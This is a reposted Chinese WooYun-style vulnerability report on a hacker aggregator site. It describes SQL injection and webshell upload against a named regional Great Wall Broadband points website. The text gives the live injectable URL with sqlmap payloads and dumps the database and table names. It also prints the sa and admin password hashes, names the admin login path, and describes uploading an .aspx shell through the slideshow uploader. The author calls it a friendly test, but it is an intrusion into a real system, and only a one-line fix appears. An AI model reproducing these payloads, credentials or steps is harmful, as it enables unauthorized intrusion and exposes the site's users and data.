记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某地区长城宽带SQL注入漏洞+getshell(详细过程与影响证明)

2014-05-28 17:40

http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 注入点在这里



Place: GET

Parameter: nid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: nid=72 AND 8365=8365



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)

Payload: nid=-6303 OR 2019=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)



available databases [9]:

[*] Appreciation

[*] GZGWBN_Points

[*] GZGWBN_WPF

[*] GZGWBN_WPF1

[*] GZGWBN_WPF2

[*] master

[*] model

[*] msdb

[*] tempdb

9个库子

Database: GZGWBN_Points

[81 tables]

+--------------------------------+

| A111 |

| A_2012_0507 |

| AoYun2012_Answer |

| AoYun2012_Answer_Bak |

| AoYun2012_Result |

| ApplyOTT |

| ApplySignUp |

| Bak_sys_custb |

| D99_Tmp |

| GZ_Lottery |

| GZ_Lottery_PlayNums |

| GZ_Point_BatchDeal |

| GZ_Point_V_Quantity_GoodsBook |

| GZ_Summer_Lottery |

| PackageSatisticsList |

| ProductPayNum |

| Questionnaire |

| VPoint_Donation_Before_2006 |

| V_Commentary |

| V_CustomerPoint |

| V_DealInfo |

| V_Deal_RowColumn |

| V_GZ_Lottery |

| V_Goods_NowQuan |

| V_Lottery_CountByDays |

| V_Lottery_CountByGoods |

| V_Lottery_CountBySH |

| V_QuantityStatistics |

| V_Quantity_Active_Book_GrowDay |

| V_Quantity_Active_SH |

| V_Quantity_GoodsBook |

| V_Summer_Lottery |

| V_Summer_Lottery_CountByDays |

| custbb |

| hd_ganentb |

| scoretbb |

| shop_basetb |

| shop_goodoneclasstb |

| shop_goodstb |

| shop_goodtwoclasstb |

| shop_helptb |

| shop_huantb |

| shop_nclasstb |

| shop_newstb |

| shop_notetb |

| shop_saytb |

| shop_scoretb |

| shop_selecttb |

| shop_usertb |

| sys_admintb |

| sys_biantb |

| sys_blackcustb |

| sys_caotb |

| sys_cuntb |

| sys_custb |

| sys_dealtb |

| sys_emailtb |

| sys_hourtb |

| sys_ozhantb |

| sys_protb |

| sys_qutb |

| sys_scoretb |

| sys_useremailtb |

| sys_xingtb |

| sys_xitb |

| sys_yingtb |

| sys_zhantb |

| sys_zhantbbak |

| sys_zhetb |

| sysdiagrams |

| tEmailCount |

| tb_Luckydraw |

| tb_phoneActivate |

| tb_sports_310 |

| tb_sports_country |

| tb_sports_help |

| tb_sports_main |

| tb_sports_mybet |

| tb_sports_ssname |

| tb_sports_user |

| vProductPayNum

挑了个库子跑表

别的库子里还有员工工资和银行卡号等信息,库实在太大了,跑的抗不住啊亲

还是SA权限

database management system users password hashes:

[*] BBSA [1]:

password hash: 0x010011a6742cfce6ff23c521222535662f07ebfcc6d2322c6462

header: 0x0100

salt: 11a6742c

mixedcase: fce6ff23c521222535662f07ebfcc6d2322c6462



[*] sa [1]:

password hash: 0x01004086ceb665942725e30e13ba2f7425abeb2c1cd1612c7b3b

header: 0x0100

salt: 4086ceb6

mixedcase: 65942725e30e13ba2f7425abeb2c1cd1612c7b3b



后台很好找:http://point.gzgwbn.net.cn/admin/login.aspx

跑表得出

+-----+----------------------------------+-------+

| uid | upwd | uname |

+-----+----------------------------------+-------+

| 1 | C922206634F4C33F728138ED57B6246B | admin |

| 4 | <blank> | NULL |

+-----+----------------------------------+-------+





登录后台后发现FCKeditor上传,顿时死的心都有了,我白费劲了,但是发现此FCK上传不能利用,至少我这个彩笔是没那本事。。。

http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fpoint.gzgwbn.net.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx



愁苦中意外发现后台传幻灯片的地方可以直接上传.aspx 顿时艳阳高照啊!!

99.jpg

到这里就算了,主要我用的这个长城宽带过了12点总掉线,给打电话投诉还没人接,大小也是一ISP啊!!所以。。但是纯属友情检测,绝对没有删改东西。

漏洞证明:

就传2个菜刀截图吧*-*

11.jpg



22.jpg

修复方案:

过滤参数,修复FCKeditor上传,最最重要是保证网络稳定啊亲,我不想半夜掉线了。

知识来源: www.wooyun.org/bugs/wooyun-2014-056728

阅读:98318 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某地区长城宽带SQL注入漏洞+getshell(详细过程与影响证明)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云